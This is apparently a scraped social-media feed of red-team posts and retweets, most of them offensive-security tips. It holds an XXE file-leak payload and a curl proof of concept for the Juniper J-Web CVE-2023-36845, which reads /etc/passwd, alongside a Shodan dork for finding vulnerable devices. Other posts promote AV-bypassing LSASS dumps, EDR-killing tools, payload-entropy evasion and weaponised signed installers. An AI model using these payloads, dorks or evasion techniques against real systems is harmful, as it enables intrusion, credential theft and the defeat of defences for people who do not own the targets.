If you're exploiting your XXE under Java, I recommend a payload like this: <!DOCTYPE root [ <!ENTITY stuff SYSTEM "."> ]><root>&stuff;</root> So that you can start the file leak from the CWD of the Java process. This is important when chaining for an RCE.
telllpu retweeted
scan4all Official repository vuls Scan: 15000+PoCs; 23 kinds of application password crack; 7000+Web fingerprints; 146 protocols and 90000+ rules Port scanning; Fuzz, HW, awesome BugBounty github.com/hktalent/scan4all #pentesting #redteam #bugbounty
AD: Local Admin to Domain Admin It doesn't matter if you don't see active sessions, always look in the Kerberos cache. query session VS klist sessions Don't attempt an LSASS DUMP, move on! GIUDA 2023090500 Now FUD again github.com/foxlox/GIUDA #redteam #adprivesc #kerberos #lsass
Scan for WordPress, Joomla, Drupal and Moodle bugs via CMSmap. Clone it. Install The Exploit Database. Update the CMSmap Database. github.com/dionach/CMSmap github.com/Doctype02/exploit… Run it on file mode. python3 cmsmap.py -i test.txt -t 200 -F -s -o test-resulte.txt
telllpu retweeted
Juniper J-Web - Remote Code Execution 🔥 - CVE-2023-36845 Nearly 14,000 Juniper devices are affected, as a search on Shodan shows: Dork : title:"Juniper" http.favicon.hash:2141724739 Poc: curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0' Here is a vulnerability scanner that has been specially developed to spot this vulnerability or you can also use Nuclei: github.com/vulncheck-oss/cve… #Infosec #Juniper #ZeroDay #CVE #Hacking
telllpu retweeted
How to massage the lower back
How To Hack Web Applications with @hakluke 👇 ⚙️ Setting up Burp Suite 🪲 Remote Command/Code Execution (RCE) 💉 SQL Injection 💉 XML External Entity Injection 🐛 Insecure Deserialization 🐞 XSS #HackerContentBlogs labs.detectify.com/2022/05/1…
"NimBlackout: Kill AV/EDR leveraging BYOVD attack" #infosec #pentest #redteam github.com/Helixo32/NimBlack…
Use asnmap and tlsx to map out the IP ranges of an ASN and then extract domain names from their TLS certificates! #HackwithAutomation #ASNmap #TLSx
Here is a small POC for doing steganography with Nim-Lang. Useful for reducing payload entropy on disk or giving you a remote Killswitch. github.com/OffenseTeacher/St…
Revamping my ☢️ Modern Initial Access training feels soo good! Next week's @x33fcon session will be a blast! - Nuked away VBA slides - 10 leaked code signing certs & abuse guidance - Signed & weaponised MSIX - Signed ClickOnce (hopefully!)🤞 - plenty of Complex Infection Chains
telllpu retweeted
USE SSP DUMP LSASS BYPASS AV gist.github.com/xpn/93f2b75b…
telllpu retweeted
CVE-2020-0796 Windows SMBv3 LPE Exploit 👏👏👏 github.com/danigargu/CVE-202…
Common ways to get RCE: - SSRF to Metadata - Jenkins /script - Jenkins Orange RCE - Leaked cloud creds/keys (online, via LFD, etc.) - Arbitrary file upload - ImageTragik - SSTI Fill in how you've gotten RCE!